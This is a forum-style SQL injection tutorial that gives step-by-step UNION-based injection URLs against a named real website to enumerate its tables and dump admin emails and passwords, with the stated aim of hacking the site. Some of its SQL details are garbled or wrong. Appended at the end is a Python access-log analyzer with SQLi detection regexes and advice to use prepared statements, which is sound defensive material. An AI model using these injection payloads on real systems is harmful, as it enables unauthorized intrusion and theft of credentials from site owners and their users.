Hello PrOleEtS, once again T00L kiT here. Today I am going to start SQL injection. This is the first class, so let's start.
Requirements:
Firefox Browser
OK, I already have a vulnerable site, like this:
http://www.morephotosradio.com/transcript.php?interview_id=2021
Check whether this website is vulnerable or not: put ' at the end of the URL, like this
Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'
Yes, I got a SQL error, as you can see.
Step 2
=> Find the table number using an order by--+- query, for example:
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+- (No Error)
and so on. When we get an error, that tells us the table number, like:
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+- ( Error)
This means it has 46 table numbers.
Step 3
=> Go to union based => Union statement and Select INT,INT
Step 4
=> Now enter the table number value and click OK.
Step 5
=> After clicking OK you will see that it auto-types the numbers 1 to 46; then click Execute to check that it is working.
It's working, we did not get any error :D
Step 6
=> Put - in the link value, like this:
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-
As you can see, when we put - we got column number 6.
Step 7
=> Now we need the version:
Replace the number 6 with the query "version()".
As you can see, we got the SQL version. If you want more information, such as user name, hostname and database, use these queries:
For Version = version()
For Database = database()
For use = use()
For Host = host@@
Step 8
=> Now we need the table information, so replace the number 6 with the query "group_concat(table_name)" (without quotes), and at the end of the URL use the query "from information_Schema.tables where table_schema=database()--+-" (without quotes), like this:
For Tables
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-
As you can see, we got all the table names. We need the admin user name because we wanna hack the website :D
Step 9
=> Now replace "database()" with User.
Select user, go to "sqli basics", select "char()", then paste "user" and click OK.
Then replace table with columns, like this:
For columns
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
Now click Execute.
Step 10
Now we need the admin email ID and password, so use this query.
Replace column_name with the data we need; ,0x3a, is used when we need more than one piece of data. At the end of the URL, type the table name.
For data
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-
As you can see, we got all the admin emails and passwords ;) :D
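Seen from the server side, the requests in Steps 1 to 10 leave a recognizable trail in the web access log. The Python sketch below is an added example, not part of the original tutorial: it assumes a Combined Log Format access log, and the log lines, client addresses and three-column UNION lists are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Request shapes from the steps above, most specific first.
RULES = [
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+(\d+)\s*--", re.I)),
    ("quote_probe", re.compile(r"^-?\d+'$")),
]
# Assumed log layout: client ident user [time] "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return (stage, match) for the first rule hit in a URL-decoded query value."""
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for stage, rx in RULES:
            hit = rx.search(value)
            if hit:
                return stage, hit
    return None, None

def summarize(lines):
    """Per client: stages in order of first appearance, highest ORDER BY index."""
    report = defaultdict(lambda: {"stages": [], "max_order_by": 0})
    for line in lines:
        m = LOG_RE.match(line)
        stage, hit = classify(m.group(2)) if m else (None, None)
        if stage is None:
            continue
        entry = report[m.group(1)]
        if stage not in entry["stages"]:
            entry["stages"].append(stage)
        if stage == "order_by_probe":
            entry["max_order_by"] = max(entry["max_order_by"], int(hit.group(1)))
    return dict(report)

# Constructed log lines: documentation IPs, column list shortened to three.
P = "/transcript.php?interview_id="
SAMPLE = [
    f'198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET {P}2021 HTTP/1.1" 200 5120',
    f'203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET {P}2021%27 HTTP/1.1" 200 312',
    f'203.0.113.9 - - [01/Jan/2024:10:02:40 +0000] "GET {P}2021+order+by+47--+- HTTP/1.1" 200 298',
    f'203.0.113.9 - - [01/Jan/2024:10:03:10 +0000] "GET {P}-2021+UNION+ALL+SELECT+1,2,3--+- HTTP/1.1" 200 901',
    f'203.0.113.9 - - [01/Jan/2024:10:04:00 +0000] "GET {P}-2021+UNION+ALL+SELECT+1,group_concat(table_name),3+from+information_Schema.tables+where+table_schema=database()--+- HTTP/1.1" 200 1440',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Log matching of this kind is a backstop. The root-cause fix is to bind interview_id as a parameter in a prepared statement and reject values that are not integers.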
I hope you like this tutorial.
Thanks for visiting